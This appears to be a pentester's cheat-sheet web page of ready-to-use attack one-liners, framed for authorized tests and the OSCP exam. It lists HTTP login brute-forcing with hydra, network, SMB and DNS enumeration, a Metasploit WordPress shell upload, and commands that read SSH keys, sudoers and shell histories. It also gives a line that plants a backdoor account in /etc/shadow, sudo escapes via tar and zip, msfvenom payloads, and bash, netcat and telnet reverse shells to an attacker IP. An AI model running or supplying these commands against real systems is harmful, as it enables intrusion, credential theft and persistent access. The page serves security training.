Here are some useful one-liners and links for pentesters. I have collected these commands to be used right away without spending time on remembering the syntax of a particular tool.

These time saver come handy in a time limited pentest or during your OSCP exam.

Disclaimer On this web site you might read about or get access to various kinds of software and technology, including but not limited to libraries, operating systems, software for communications, mobile phones and tablets, Android software and Linux, even cars and motorcycles, security and penetration testing software, software used in security research and forensics, some samples of software which can be used (elsewhere) for malicious or illegal purposes. You will read about or be provided with the ways to change it, to operate it and to use it. You might find advice and recommendations, which are only an opinion, and not a legal advice or commercial recommendation..
Bear in mind, please, that everything you do, you do solely at your own risk and responsibility. In no way the author of this web site, information, graphics and other materials presented here or related to it can be made liable or anyhow else responsible for your own actions as well as actions of any third party and their direct or indirect results or consequences with or without the use of this information as well as the software, technology and systems mentioned and/or presented here, no matter if developed by the author or by any third party.
In no way it is guaranteed that you will meet any suitability for any particular purpose, safety, security, legality or even simply functioning of the software and systems described here. You have to make sure each time yourself, whether what you do, is really what you intend to do, and that you are ready to be yourself responsible for. All the recommendations and experiences described here are the opinions of corresponding authors and are to be taken with care and own full responsibility.
The software provided on or through this web site, linked to from this web site or anyhow else related to this web site is provided by the corresponding authors on their own terms. We provide all the software here as is without any guarantees to you. You are responsible for deciding whether it is suitable for you or not. You are also responsible for all direct or indirect consequences of using this software.
Other web sites linked to from the current one are out of the author's control, we can not guarantee anything about their content, its quality or even legality. We can not be liable for any use of the linked to web sites or of the information presented there.
We reasonably try to keep this website running smoothly and to deliver information to the best of our knowledge corresponding to the state of the art at the times when the information is composed, usually presented together with the information, and out of good intents. We can not however guarantee and can not be liable for this website being temporarily or permanently unavailable, presenting unreliable information or software, or any other similar or not malfunctioning or functioning not up to your expectations as well as any consequences which might result from this site's operation.

Do not run these commands unless you understand exactly what you are doing!

It is illegal to access like this the machines you are not legally authorized to pentest!

I assume Kali Linux and Bash below. I also assume that the target is on the network. Please, double-check the address you target before runing commands from here!

These commands might be and often are dangerous! You are alone responsible for any direct or indirect consequences of using them! Please, do not use them unless you fully understand the consequences and are ready to deal with them, also legally. If you disagree, please, leave this site immediately.



Crawls Google and Bing to find emails, subdomains and links: web-hunter.


HTTP form bruteforcing

hydra http-form-post "/login.php:login=^USER^&password=^PASS^&par=val:Wrong password" -l root -P rockyou.txt -t 10 -v
hydra http-form-post "/index/login.asp:password=^PASS^&username=^USER^&submit=Enter:Username" -L users.txt -P /usr/share/wordlists/rockyou.txt -t 5 -vvv


Power-tool when other tools do not fit the purpose: Patator.

Network enumeration

Ping sweep in shell

for i in `seq 1 10`; do (ping -n  -c 1 192.168.2.$i | grep "from" | cut -f4 -d" " | tr -d ":") &  done;

Ping sweep nmap

nmap -sn
nmap -sn -oG ping.sweep.res.txt # grep-friendly output

Port scan nmap

nmap -p 80 -iL host.list.txt -oG web.servers.list.txt # takes hosts from the list
Scanning all ports (-p-) with nmap quickly (-T5):
nmap -p- -T5
Scanning quickly some, 25 in this case, top ports (ports used often):
nmap -T5 --top-ports=25


This program asks arp and identifies hosts quickly. If the range is not given, many networks get scanned.

Make sure you use the -i interface switch on a multi-NIC Kali.

netdiscover -i eth1 -r
Passive scan avoids detection
netdiscover -p  -i eth1 -r


Another way to detect host passively is to check the arp table already built:
Arp-scan is an advanced arp tool with many capabilities. One of the easy ways to scan local network with it would be:
arp-scan --interface eth1 --localnet


sudo tcpdump -i wlan0 -s0 port 110 -w # s0 = whole packet tcpdump -nXAvvv -r # read the capture

Web Server Enumeration


dirb http://$tgt

HTTP enum nmap

nmap -vvv --script http-enum.nse --script-args http-enum.basepath='/'

Nikto tools

nikto -host

Services Enumeration

OS and software version detection with nmap

nmap -iL active.web.servers.txt -sV -O

SMTP Enumeration

Python script:

SNMP Enumeration

onesixtyone -c communities.txt -i ips.txt # ip addresses
snmpcheck -t # -t target host, see man
# prints mib code, see other -communities in the file linked above
snmpwalk -c public -v1 ‘./ users‘ snmpwalk -c public -v1 ‘./ software‘

SMB Enumeration

Using smbclient to -L list services without -N password:
smbclient -N -L \
Nbtscan, enum4linux, nmap to scan SMB are below:

nbtscan # host names and other smb info
enum4linux -a # enumerates users, machines, names, shares, policies
nmap -p139,445 --script smb-enum-users -iL smb.servers.list.txt # get users
nmap -p139,445 --script smb-check-vulns --script-args=unsafe=1 -v -iL
smb.servers.list.txt # finding vulnerabilities

on a newer nmap these scripts work instead:
 - no additional args are needed

Shares and OS discovery over SMB

nmap -v --script smb-enum-shares.nse -p445 -iL smb.servers.list.txt # smb shares
nmap -v -p139,445 --script smb-os-discovery.nse -iL smb.servers.list.txt # smb os discovery

DNS Enumeration

DNS Server Version

nmap -sSU -p 53 --script dns-nsid $tgt

Zone Transfers

host -t ns # gives dns-server
host -t axfr dns-server # makes zone transfer
dig axfr @dns-server
dnsrecon -t axfr -d
d=$1; for ns in $(host -t NS $d | cut -f4 -d" ");
do host -l $d $ns | grep "has addr"; done


wpscan -u
wpscan --enumerate users -u

# Upload shell with metasploit:
# run 'msfconsole' first then
  use exploit/unix/webapp/wp_admin_shell_upload
  set rhost
  set targeturi wordpress
  set username admin
  set password admin

Yertle tool

git clone
# alternative link:
cd WPForce
# test give logins and passwords
python -i usr.txt -w pass.txt -u ""
# then get a shell, it is limited, use metasploit or
# this article better:
python -u "admin" -p "admin" -t ""

Searching exploits

searchsploit the-app-you-discovered


Escalating from docker group to root:

Post-exploitation enumeration

Enumerating a Linux machine

unix-privesc-check standard | grep WARNING

General enumeration

cat /etc/*-release  #OS version
uname -a

rpm -q kernel

cat ~/.*history #recent commands

find / -perm -o w -type d 2>/dev/null # world-writable folders
find / -perm -4000 -user root 2> /dev/null # suid binaries

egrep '[0-9a-z]{32,32}' -R . 2>/dev/null # searching regexp, flag

grep "root" * -R | less
grep "pass" * -R | less
tail /etc/passwd # list last users, usually human accounts
su username # - afterwards, works when sudo is not there sometimes

cat /etc/sudoers # getting sudoers
cat /etc/sudoers.d/*

cat ~/.ssh/* # ssh keys
cat /home/*/.ssh/* # ssh keys of others
id # check your groups and their privileges

# add a user "user" with password "123"
echo "user:$6$7heg3R.G$l2H7Sqi1WCWVy.wzyxcyoMi0fL3/q87ssRIwxNovJjFriuc4hbpagcrAegubexgSJA06vvnL41XdeLILDoKBM0:17415:0:99999:7:::" >> /etc/shadow

# lists commands current user may run as root
sudo -l

Check history and log of administrative tools, e.g. mongo:

cat ~/.dbshell
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.sh_history
- (Get-PSReadlineOption).HistorySavePath
type C:\Users\username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Running commands from other commands

# tar
sudo tar -cf foo.tar --checkpoint-action=exec=/bin/bash --checkpoint=1

# zip
sudo zip --test --unzip-command="sh -c /bin/bash"

# vi

Vulnerability scanning

#Try nmap scripts, maybe even all of them :) 
nmap --script all

Defect scanning


Sqlmap searches for SQLi defects.

Exploiting and Exploits Engineering


An advanced SQLi exploitation tool: Albatar.


pattern_offset.rb 12345678 # EIP value
pattern_create.rb 2700 # bytes to generate
nasm_shell.rb # generates opcodes
  	mov eax, esp 	# 89E0
  	inc eax		# 40
  	jmp esp		# FFE4
  	push esp	# 54
  	retn		# C3
  	call esp	# FFD4

Generating payloads

#list payloads
msfvenom --list payloads

#metasploit, payload + options, encoder + options
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 10

# add some nops 90 before the shikata ga nai decoder
 format of the exploit: -f [c|python|bash|ruby|...]   see msfvenom --help-formats
 executable formats: -f [exe|elf|msi|psh]
 --smallest will generate the smallest possible payload
 --platform windows | linux
 -a x86 | x64  # architecture

# an example for SL Mail
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f c -e x86/
shikata_ga_nai -b "\x00\x0a\x0d"

Immunity debugger and mona script

!mona modules # check NX and ASLR disabled
!mona find -s "\xff\xe4" -m abc.dll


Spawning a shell - makes your remote shell more usable

python -c 'import pty; pty.spawn("/bin/sh")' perl —e 'exec "/bin/sh";'

Various shells

Reverse shell with bash and redirects

bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1

Generating reverse shell payloads msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$attacker_ip LPORT=$attacker_port -f elf > shell

Handling it in metasploit:

use exploit multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost $attacher_ip
set lport $attacker_port

Shell with Ncat with SSL and IP Filter

ncat --ssl -nlvp 443 --allow # listen ncat --ssl 443 -c "cmd.exe" # connect

Shell with telnet

nc -lvp 4444 # attacker's machine, for input nc -lvp 4445 # attacker's machine, for output telnet [atackers ip] 4444 | /bin/sh | [local ip] 4445 # On the targets system. Use the attackers IP!

mknod shell

mknod backpipe p && nc [attackers ip] 443 0backpipe nc -nlvp 443 # on the attacker's machine

Serving Payloads

One line servers

python -m SimpleHTTPServer 8080
python -m pyftpdlib -w -d . -V -p 2121 # write in current folder activated!
python -m CGIHTTPServer # executes scripts in ./cgi-bin/ , sample script - simple uploading site, can be served or simply run!

Cross Pasting

cat << EOF > res.txt
> code
> more code

ZSSH - file transfers in ssh shell

# to download a file
root@target: sz file.txt
# to upload Ctrl-Space, then
zssh > sz file.txt

SSH tunneling

ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip] ssh -L 8080: root@ # Local Port

Open Remotely port 80 of on port 8080 on Remote server

ssh -R 8080: root@ # Remote Port

SSH dynamic forwarding

ssh -D -N [username]@[ip] proxychains ifconfig

SSH Audit host

Password cracking

A large list of password recovery tools:
Calling john from metasploit for NTLM cracks:

CEWL - building word lists

cewl -d 0 -m 5 -w mylist.txt
# this will make a list of words of at least 5 characters and save it. Depth = 0 - links are not followed.
diff --new-line-format="" --unchanged-line-format="" <(sort mylist.txt) <(sort wikipedia.langs.lst) | grep -iv "wiki" | uniq
# removing the wikipedia words and languages listed
List of languages on Wikipedia: wikipedia.langs.lst

John - mutate the word list

john -wordlist:words.txt -rules:Wordlist -stdout >> passwords.txt
See the Wordlist rules list in /etc/john/john.conf from [List.Rules:Wordlist] line


This website will crack some kinds of hashes for you online.


 * Mach larger arsenal:  my fork:
 * Pentest wiki: my fork:
 * Hacking tutorials:
 * Linux enumeration by g0tm1lk:

Last update: 04/03/2019